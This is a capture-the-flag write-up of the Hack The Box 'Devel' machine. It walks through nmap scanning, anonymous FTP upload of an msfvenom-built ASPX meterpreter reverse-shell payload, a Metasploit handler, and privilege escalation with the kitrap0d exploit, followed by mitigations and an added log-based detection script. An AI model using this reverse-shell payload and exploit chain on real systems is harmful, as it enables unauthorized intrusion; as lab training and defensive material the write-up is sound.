Hack The Box | Devel — Writeup

Max K
Jan 3, 2020

Here is the fourth box in the Practical Ethical Hacking course by The Cyber Mentor. Let’s find out what is hiding there.

Scanning

I use nmap to scan all the ports with the -A option, so the initial scan gathers as much information as possible.

nmap -p- -A -T4 10.10.10.5

PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM <DIR> aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
|_03-17-17 04:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7

Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)

  • Port 21 — FTP service with anonymous login allowed. We can try to connect to it and look for files.
  • Port 80 — HTTP service running on Microsoft IIS 7.5, a potentially vulnerable version. We can search for exploits and visit the web page.

Nothing interesting here; we already know the IIS version. Let’s try to connect to FTP.

ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.

iisstart.htm looks like the start page of the web site. I’ll try to fetch welcome.png through the site.

The FTP and HTTP services serve the same folder. If I upload a malicious file over FTP, I can execute it from the browser.

Exploitation

To create the payload file I’ll use msfvenom.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.10 LPORT=4444 -f aspx > ex.aspx

  • -p chooses the payload;
  • LHOST is the attacker’s machine IP;
  • LPORT sets the listening port;
  • -f chooses the output file type.

Then we need to run a handler, a program that waits for a connection from the target machine on port 4444 and sends the meterpreter stage to it once it connects. To do this, run Metasploit and execute the following commands.

> msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.10
LHOST => 10.10.14.10

We need to choose the same payload that we used when generating the file with msfvenom.

msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.10:4444

Now we need to go back to the ex.aspx file, upload it using FTP and execute it.

ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put ex.aspx
local: ex.aspx remote: ex.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2857 bytes sent in 0.00 secs (8.1333 MB/s)

Now we can execute it through the browser.

Nothing visible happened in the browser, but we need to check Metasploit.

Now we have a meterpreter session! That’s nice, but we have a problem.

meterpreter > getuid
Server username: IIS APPPOOL\Web

We are not NT AUTHORITY\SYSTEM, so we need to escalate privileges. We can try the built-in meterpreter command.

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

That didn’t work. Now I’m going to try Local Exploit Suggester. This is a very interesting tool; you can read more about it here.

meterpreter > background
[*] Backgrounding session 1…
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 exploit(multi/handler) > options

We need to choose a session.

msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run

Now it’s going to check whether the system is vulnerable to each local exploit Metasploit has for this OS.

I’ll use ms10_015_kitrap0d exploit for now.

msf5 exploit(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 1
session => 1
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.10
LHOST => 10.10.14.10
msf5 exploit(windows/local/ms10_015_kitrap0d) > run

The exploit did its work, and we got a meterpreter session back again.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

It worked!

Mitigation

As I see it:

  1. The OS and IIS should be updated to at least the latest supported versions, with all current updates installed.
  2. Anonymous login to FTP server should be disallowed.
  3. The web server root folder should be separated from the FTP root folder.
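As an added example that is not part of the original writeup, here is detection logic for the chain used above (an anonymous FTP upload of a server-side script followed by an HTTP request for the same path), run over constructed sample FTP and IIS log lines. The field layout is a simplified assumption for the example, not the real IIS W3C log format, and the window and extension list are assumptions too.

```python
"""Detection for the chain above: an anonymous FTP upload (STOR) of a
server-side script followed by an HTTP request for the same path.
Log lines below are constructed samples in a simplified W3C-like layout."""
import os
from datetime import datetime, timedelta

SCRIPT_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".php", ".jsp"}
FTP_FIELDS = ["date", "time", "c_ip", "user", "method", "path", "status"]
WEB_FIELDS = ["date", "time", "c_ip", "method", "path", "status"]
# Constructed FTP log: date time c-ip cs-username cs-method cs-uri-stem sc-status
FTP_LOG = """\
2020-01-03 10:00:05 10.10.14.10 anonymous RETR /welcome.png 226
2020-01-03 10:01:10 10.10.14.10 anonymous STOR /ex.aspx 226
2020-01-03 10:02:00 10.10.14.11 alice STOR /report.txt 226
"""
# Constructed IIS web log: date time c-ip cs-method cs-uri-stem sc-status
WEB_LOG = """\
2020-01-03 10:00:20 10.10.14.10 GET /welcome.png 200
2020-01-03 10:01:30 10.10.14.10 GET /ex.aspx 200
"""

def parse_log(text, fields):
    """Turn whitespace-separated lines into dicts; skip comments and malformed lines."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#") or len(parts) != len(fields):
            continue
        row = dict(zip(fields, parts))
        row["when"] = datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
        rows.append(row)
    return rows

def find_upload_then_execute(ftp_text, web_text, window_minutes=60):
    """Return (path, client_ip, seconds) for every anonymous STOR of a script
    file that was then requested over HTTP within the window."""
    window = timedelta(minutes=window_minutes)
    web = parse_log(web_text, WEB_FIELDS)
    alerts = []
    for up in parse_log(ftp_text, FTP_FIELDS):
        ext = os.path.splitext(up["path"])[1].lower()
        if not (up["method"] == "STOR" and up["status"] == "226"
                and up["user"].lower() == "anonymous" and ext in SCRIPT_EXTENSIONS):
            continue  # downloads, authenticated users and non-script files do not alert
        for req in web:
            if req["path"] == up["path"] and up["when"] <= req["when"] <= up["when"] + window:
                delta = int((req["when"] - up["when"]).total_seconds())
                alerts.append((up["path"], req["c_ip"], delta))
    return alerts
```

On the sample logs only the anonymous STOR of /ex.aspx followed by its GET 20 seconds later is reported; the image download and the authenticated text upload are ignored.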

Output

  1. Metasploit and meterpreter are not required to get root access. I could use shell/reverse_tcp and set up a listener using netcat. I’ll definitely work on this machine again without using Metasploit and meterpreter, and as usual I want to mention the writeup on it by Rana Khalil.
